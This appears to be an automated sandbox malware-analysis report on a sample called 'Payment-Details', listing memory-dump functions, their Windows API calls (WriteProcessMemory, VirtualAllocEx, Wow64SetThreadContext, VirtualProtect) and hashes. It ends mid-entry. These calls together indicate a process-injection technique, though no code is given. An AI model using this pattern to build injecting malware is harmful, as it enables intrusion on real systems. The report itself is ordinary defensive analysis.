                                        Download Yara Rule
                                        APIs
                                        • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06363190
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        • Opcode ID: 9597a742892263a2117337c12e3ca3a128b9089656a47ef87b731330580ea606
                                        • Instruction ID: 644f0712a55c5652e6c9dea71f86f9e7990100592ea3842047eba0c8965c36dd
                                        • Opcode Fuzzy Hash: 9597a742892263a2117337c12e3ca3a128b9089656a47ef87b731330580ea606
                                        • Instruction Fuzzy Hash: 8B212575D003499FDB10DFAAC885BDEBBF5FF48310F10882AE959A7240D7799944DBA0
                                        Function 06364540 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063645CC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        • Opcode ID: d14be2ad63df83785ab3648294895b20da154fdb199033c89475adcfd8ffda85
                                        • Instruction ID: 33d73a13832ab1a71b82ca4838dfd8b7d744703e1e55326affcee981f42a4a3b
                                        • Opcode Fuzzy Hash: d14be2ad63df83785ab3648294895b20da154fdb199033c89475adcfd8ffda85
                                        • Instruction Fuzzy Hash: CD21367180035A9FDB10DFAAC845BEEBBF5BF48310F54842AE959A3240C7399955DBA0
                                        Function 06362BD8 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06362C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: b3c4d463ffbf60076d059445964ee431afea6e495f0cb913af5411be0542692e
                                        • Instruction ID: 10910a078e4dfeeb337296923546a321f23749e3e53fe34a0ef9509db156f5bc
                                        • Opcode Fuzzy Hash: b3c4d463ffbf60076d059445964ee431afea6e495f0cb913af5411be0542692e
                                        • Instruction Fuzzy Hash: B9215971D003099FDB50DFAAC4857EEFBF4EF48620F54842AE459A7240CB789645CFA0
                                        Function 063634E8 Relevance: 1.6, APIs: 1, Instructions: 64memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06363564
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: c59b677a6709e55e5ccbfddad041264df7c53aebce13bdf76503fd8ebcc393c7
                                        • Instruction ID: 624d79a9a550731bbd923c5defa8c6946f59a422258cf3f840dbbcd2a0ae3ae8
                                        • Opcode Fuzzy Hash: c59b677a6709e55e5ccbfddad041264df7c53aebce13bdf76503fd8ebcc393c7
                                        • Instruction Fuzzy Hash: BD2157718003099FDB10DFAAC845BEEFBF4EF88220F10842AE418A7240CB389545CFA1
                                        Function 06362BE0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06362C5E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        • Opcode ID: 1d151322d9b768b3388f5ed52850f7154b49fe2175a919ca74e30d490ae7db6d
                                        • Instruction ID: 0f915116d8406b1e664d9174b98456f7bb357470d01fc75f41c7046567187e2c
                                        • Opcode Fuzzy Hash: 1d151322d9b768b3388f5ed52850f7154b49fe2175a919ca74e30d490ae7db6d
                                        • Instruction Fuzzy Hash: F1214971D003098FDB10DFAAC4857EEBBF4EF88710F548429D459A7240CB789945CFA0
                                        Function 063634F0 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06363564
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 9ffaf96dd615d491f336d90c157cf82e4cba4ad54d8402259f22b85fe3e57127
                                        • Instruction ID: 6cac51e4495540c658fd24a334a1b36c3836d9dadea7209181f5818f12aae9f9
                                        • Opcode Fuzzy Hash: 9ffaf96dd615d491f336d90c157cf82e4cba4ad54d8402259f22b85fe3e57127
                                        • Instruction Fuzzy Hash: 28213571C003099FDB10DFAAC845BAEBBF4EF88620F108429E519A7240CB789545CFA0
                                        Function 06364438 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 063644AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: FileView
                                        • String ID:
                                        • API String ID: 3314676101-0
                                        • Opcode ID: f678589c4dab76835e4e41caf5bb6394b6c1795979fa508ac2dc2e073ede737b
                                        • Instruction ID: 1df620abe3346215837ef5a6ed9afaa52b4945f6a94472808578c620cbb17cb3
                                        • Opcode Fuzzy Hash: f678589c4dab76835e4e41caf5bb6394b6c1795979fa508ac2dc2e073ede737b
                                        • Instruction Fuzzy Hash: D81189758003099FDB20DFAAD8457DEBBF5EF88720F10C819E519A7250CB75A540CFA0
                                        Function 072CDA80 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 072CDAF4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693344911.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_72c0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: f47a8f725bc00e9c3cd1750066125fe2a805e838ca6e245c33aedff2c944efc2
                                        • Instruction ID: 04b5e90f251a84eebb15ca4f0213276e7728ec601570c65c461a78a967a94828
                                        • Opcode Fuzzy Hash: f47a8f725bc00e9c3cd1750066125fe2a805e838ca6e245c33aedff2c944efc2
                                        • Instruction Fuzzy Hash: A11124B1D003499FDB10DFAAC884B9EFBF4BF88620F14882ED419A7240C775A904CFA0
                                        Function 06362FF8 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0636306E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 1706dfb99f80a8dbce020c111c28b8300af046260d535386c57ec7789c118281
                                        • Instruction ID: 43a732a1569d9b693780f0f9e90fa284bb712da5f00e7df19b4dc26b09c19efb
                                        • Opcode Fuzzy Hash: 1706dfb99f80a8dbce020c111c28b8300af046260d535386c57ec7789c118281
                                        • Instruction Fuzzy Hash: FC1189758003499FDB20DFAAC8447DEBFF5EF88320F108819E919A7250C7369505DFA0
                                        Function 06364440 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MapViewOfFile.KERNEL32(?,?,?,?,?), ref: 063644AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: FileView
                                        • String ID:
                                        • API String ID: 3314676101-0
                                        • Opcode ID: 616b67fa6a3539347759fb4d55d6b8d78ea6ef4568af82fdb2904a69ba5a2bfb
                                        • Instruction ID: e45e937601c6980f0417ce76a78a6beee99a2d2573f088a349db2af8f0b710e7
                                        • Opcode Fuzzy Hash: 616b67fa6a3539347759fb4d55d6b8d78ea6ef4568af82fdb2904a69ba5a2bfb
                                        • Instruction Fuzzy Hash: 431134758003499FDB20DFAAC845BDEBBF5EF88720F148819E519A7250CB79A944DFA0
                                        Function 06363000 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0636306E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1689820832.0000000006360000.00000040.00000800.00020000.00000000.sdmp, Offset: 06360000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6360000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 761bf28ab04aca942bbfd2a927a6d94bac15feba5b183e8954a4af50356282b0
                                        • Instruction ID: 812a1273ed45a23393b7f354b8d42809bfef7253629ded4a93de13e31660420d
                                        • Opcode Fuzzy Hash: 761bf28ab04aca942bbfd2a927a6d94bac15feba5b183e8954a4af50356282b0
                                        • Instruction Fuzzy Hash: 251134758003499FDB20DFAAC845BDEBBF5EF88720F148819E519A7250CB76A944DFA0
                                        Function 0723B7B8 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 02bdac77c57ff438b8ebe7e3184307c8b2cd2da460cce2ca7f41da47d09c97c1
                                        • Instruction ID: 873d8c9393e3452cd1dc25a0e48e110b328985330ffaa7f17be66f59cd32cfbb
                                        • Opcode Fuzzy Hash: 02bdac77c57ff438b8ebe7e3184307c8b2cd2da460cce2ca7f41da47d09c97c1
                                        • Instruction Fuzzy Hash: 6F218EF0910248CFDB10CF28D9967E977F5EB49300F1084AAD909A7355CB789E80CF81
                                        Function 072CEAF8 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,?,?), ref: 072CEB63
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693344911.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_72c0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: 4a48169bc8d3fc4831eee9511e18fc26bc3ef431a04bcf5b58f48e57fb7d8cd2
                                        • Instruction ID: a31fe68ed703e695bff0db6b7a0a55274b9f9a3ec2480b69ed0bae0a3d972188
                                        • Opcode Fuzzy Hash: 4a48169bc8d3fc4831eee9511e18fc26bc3ef431a04bcf5b58f48e57fb7d8cd2
                                        • Instruction Fuzzy Hash: A91137758003499FDB20DFAAC845BEEBBF5AF88720F148819D519A7240CB759544CFA0
                                        Function 066F0FF1 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: !
                                        • API String ID: 0-2657877971
                                        • Opcode ID: bd44f2c408ebbafb47c6b35e22823029859197a3c863ed314b8ec2409c322bfd
                                        • Instruction ID: 015e0db22d1f7688f9412681935fc9950d6e19d45deeca3b10cf46b869777195
                                        • Opcode Fuzzy Hash: bd44f2c408ebbafb47c6b35e22823029859197a3c863ed314b8ec2409c322bfd
                                        • Instruction Fuzzy Hash: DE117C78D05268DFDBA0DFA5C894BECBBB5EB49310F1084DAD94AB7240DB315A92CF50
                                        Function 0723CBA9 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: :JZ_
                                        • API String ID: 0-2019505780
                                        • Opcode ID: 7f4d756987027736776363bf20542d72ead64aebbc39a4423d25c6728c7a94fa
                                        • Instruction ID: 3972f1a5bbf7f85914bbb8e69f16abd2a141097fcff9d6b46e9849c0ed4cab36
                                        • Opcode Fuzzy Hash: 7f4d756987027736776363bf20542d72ead64aebbc39a4423d25c6728c7a94fa
                                        • Instruction Fuzzy Hash: C6115EB4A00218CFDB90CF28D896BA9B3F6FB08300F1081E9D50997355D7359E80CF92
                                        Function 066F0C0D Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: .
                                        • API String ID: 0-248832578
                                        • Opcode ID: 3016126697d4ad61905dd63d915bbc81710f0a264f8749f471e5b3872a3d1e5f
                                        • Instruction ID: 288ed6b91a0eca84ca51cd0cdcaae3931777dc8b2bbb6315b1befd2930b9a05d
                                        • Opcode Fuzzy Hash: 3016126697d4ad61905dd63d915bbc81710f0a264f8749f471e5b3872a3d1e5f
                                        • Instruction Fuzzy Hash: CC11D374D05268DFDBA0CF69C895BA8B7B2FB49300F5081E9D61DA6240DB355E85CF40
                                        Function 066F12D1 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: '
                                        • API String ID: 0-1997036262
                                        • Opcode ID: 29d377a9c634554731c4c80b1a77f8a92c10321e0b838167fcadd9f8324ae610
                                        • Instruction ID: b44bf083a3cf200d991b1afb99cb83c090e4fd8d48a31d99d5876cd125ceb288
                                        • Opcode Fuzzy Hash: 29d377a9c634554731c4c80b1a77f8a92c10321e0b838167fcadd9f8324ae610
                                        • Instruction Fuzzy Hash: F7119B78905228CFDB60CF65C998BE8BBB1BB09304F1081D9D90DA3251C7326E86CF40
                                        Function 066F0872 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 616c5ccd17ef2b307219b7d142cd3c5070b6551c7866ce858a79bd90a8b39a5a
                                        • Instruction ID: 54523a5ba06b9e35c06eda29cd9e0d297e02a83a56ed121c77f1c8dce0a50928
                                        • Opcode Fuzzy Hash: 616c5ccd17ef2b307219b7d142cd3c5070b6551c7866ce858a79bd90a8b39a5a
                                        • Instruction Fuzzy Hash: 4901A274901119CFDBA4CF15D890BE9B7B6EB09310F5084DAC50EA7241CB32AE86CF50
                                        Function 066F13B8 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1690301645.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_66f0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 9
                                        • API String ID: 0-2366072709
                                        • Opcode ID: b1c05c74a40715836a2028b4d9fd2e8d0cf6520e859de9df1c7af90ffa5bba27
                                        • Instruction ID: bbd81fb623437c3d29522110cca0689aae366f219711877236417d137f2f0a30
                                        • Opcode Fuzzy Hash: b1c05c74a40715836a2028b4d9fd2e8d0cf6520e859de9df1c7af90ffa5bba27
                                        • Instruction Fuzzy Hash: 68017A748002A99FDBA1CF94C854BECBBB5BB09304F0081DAD91DA2251C7325A86CF40
                                        Function 070E5440 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: v
                                        • API String ID: 0-1801730948
                                        • Opcode ID: 5268586d58e762c9ac3f36b93f8c818433d938c63f98f5a7151b6a10912bb0aa
                                        • Instruction ID: 388e6e8b3a21532dc1f47393d962e2012e7db32a05d83903b9ed92a5b50719bf
                                        • Opcode Fuzzy Hash: 5268586d58e762c9ac3f36b93f8c818433d938c63f98f5a7151b6a10912bb0aa
                                        • Instruction Fuzzy Hash: 02E092B49155198BEBA0CF54DC84B8DB7B4BB49318F20AA95C009A7290C7746D848F59
                                        Function 0752EDE0 Relevance: .7, Instructions: 677COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693466177.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7510000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bd16dbded29152312ce728e1b4e3eba4d517801b2b0d2669aaa4091445507cf3
                                        • Instruction ID: 89b996e40fd4c6d33f8cf0155318d3ce3571939224e6cd43f14dbe757049f092
                                        • Opcode Fuzzy Hash: bd16dbded29152312ce728e1b4e3eba4d517801b2b0d2669aaa4091445507cf3
                                        • Instruction Fuzzy Hash: 665229B5A002298FDB24CF68C985BDDBBF6BB89300F1541D9E509A7391DA309D81CF61
                                        Function 07235868 Relevance: .7, Instructions: 659COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be4e98ae69a73a9d3347761f60573ad9d6094a1bbc1bc121051d30abddbe4116
                                        • Instruction ID: bc3de50253d5d1974a9ec32650a6cedcde2b3ad794684a073d5796ca0b98bc5e
                                        • Opcode Fuzzy Hash: be4e98ae69a73a9d3347761f60573ad9d6094a1bbc1bc121051d30abddbe4116
                                        • Instruction Fuzzy Hash: 62424C75A10219DFCB14DF64C884E99BBB2FF89310F1186D9E509AB221DB31ED95CF81
                                        Function 07070D98 Relevance: .6, Instructions: 577COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 03dede2258e2b90c0084f58c943a6a0841b6b52d8182a235ef68fd61cc788d4f
                                        • Instruction ID: c7b160d7b2dba4574c1a9a62a159b68a5c0f374b18d60725824247fdf773dd45
                                        • Opcode Fuzzy Hash: 03dede2258e2b90c0084f58c943a6a0841b6b52d8182a235ef68fd61cc788d4f
                                        • Instruction Fuzzy Hash: 7842E8B4E0420ECFDB54DFD5C8886AEB7B2FB89305F118215D912AB390D7785982CF69
                                        Function 0725EE32 Relevance: .5, Instructions: 538COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2b05c617bb193a6a130adb28188ae83d52060115c2673a8b7a35b2766cf16cfc
                                        • Instruction ID: 3ac720c21b1edf7b4d18bc6fb40ebd192c89489ff76a9d8dd08a26982edbac66
                                        • Opcode Fuzzy Hash: 2b05c617bb193a6a130adb28188ae83d52060115c2673a8b7a35b2766cf16cfc
                                        • Instruction Fuzzy Hash: EA227BB5A10206DFDB04CFA4D994A6AB7F6BF88300F158159E905EB3A5CB75ED40CB90
                                        Function 0725E268 Relevance: .5, Instructions: 516COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 82e3df44e88d40db8124d40b6cdee399d7a01a2ba05534761109d927ee5b87e6
                                        • Instruction ID: f0fa474ea41b78af34fc9b3355be3d07503c219d41b492d1bd287eb5bbb61248
                                        • Opcode Fuzzy Hash: 82e3df44e88d40db8124d40b6cdee399d7a01a2ba05534761109d927ee5b87e6
                                        • Instruction Fuzzy Hash: 0B227FB1E1021ACFDB15CFA4D854AAEBBB6FF48700F158159E801AB394DB789E41CF91
                                        Function 0725F645 Relevance: .5, Instructions: 483COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693288915.0000000007250000.00000040.00000800.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7250000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9af2a59060b2c62e323451d6c696d41827184987b3445f0ec6e905031b2ecc88
                                        • Instruction ID: 8d4928a27d8488cf886497465a674e60584e9c6db05ebe94d71b5b4c81368500
                                        • Opcode Fuzzy Hash: 9af2a59060b2c62e323451d6c696d41827184987b3445f0ec6e905031b2ecc88
                                        • Instruction Fuzzy Hash: 0C1237B4B10206CFDB14DF28C698A6AB7F6BF88711F1584A9E901DB361DB31EC41CB61
                                        Function 070EDC30 Relevance: .5, Instructions: 481COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3e31d04cae25adcf9e68e62d343f0fc53cba0801a83b7b2953bdec9a3dba499d
                                        • Instruction ID: ef1235091e157612e66d5df484b1f7a2bf26e5043337c0573e65c6cb6ea7f6ef
                                        • Opcode Fuzzy Hash: 3e31d04cae25adcf9e68e62d343f0fc53cba0801a83b7b2953bdec9a3dba499d
                                        • Instruction Fuzzy Hash: 3D124AB1B00205DFDB64DFA5D884A6EB7FAFF88300F148669D40A9B794DB35AC45CB90
                                        Function 07071DA8 Relevance: .5, Instructions: 460COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 293e7102f10fd03eb264ecd80a01ebe885649cdfd116537463df41b9e1a510de
                                        • Instruction ID: 4d36b5657d4c2d9bef00bdc7e0fc660e5494ae956b72c191ab63aafd5f680b9a
                                        • Opcode Fuzzy Hash: 293e7102f10fd03eb264ecd80a01ebe885649cdfd116537463df41b9e1a510de
                                        • Instruction Fuzzy Hash: BF22D1B4E01218CFCB54DFE5C8586ACBBB6FF8A305F508269C41AAB344DB749985CF15
                                        Function 072325A8 Relevance: .4, Instructions: 437COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1693235410.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7230000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 039ccb61b1c24f767b3903b65cb914562a9eaedc9a58caa51d2728eb4e96b6e4
                                        • Instruction ID: 0ab58619c3ddd41fdd1b791faad88fc6b9db346ff9de162eac8b0cc3f7da6e77
                                        • Opcode Fuzzy Hash: 039ccb61b1c24f767b3903b65cb914562a9eaedc9a58caa51d2728eb4e96b6e4
                                        • Instruction Fuzzy Hash: DF1239B4A10219CFCB14EF64C894B9DB7B6BF89300F5186A9D44AAB365DB30ED85CF50
                                        Function 070EF8E0 Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692780172.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70e0000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 917188dcf7d693d114621d43da168a57465a609cb225deaeb19c4b443fbd106a
                                        • Instruction ID: eda78f08de6fc533e5a9865adc46fb2a9f95457a5aec264f6e71d40f86c64436
                                        • Opcode Fuzzy Hash: 917188dcf7d693d114621d43da168a57465a609cb225deaeb19c4b443fbd106a
                                        • Instruction Fuzzy Hash: 35F1EA74A00219DFCB44DFA4D998A9DB7B6FF88300F118659E805AB3A5DB75FC42CB81
                                        Function 070718C0 Relevance: .4, Instructions: 362COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1692426534.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7070000_Payment-Details.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2639b05c5a533d9abe82424811ac49eccb2d7afa5dd8fc0a9abd351555a677a4
                                        • Instruction ID: 1ba98bea3c84bee3560bb01905955084f8ff9bcec111e3af3c34c2fd0b93dae8
                                        • Opcode Fuzzy Hash: 2639b05c5a533d9abe82424811ac49eccb2d7afa5dd8fc0a9abd351555a677a4
                                        • Instruction Fuzzy Hash: A8F1B2B4E0120CDFDB54DFA5D8986ADBBB6FF8A311F204229E816A7390DB345985CF05
                                        Function 0725B0E8 Relevance: .3, Instructions: 260COMMON
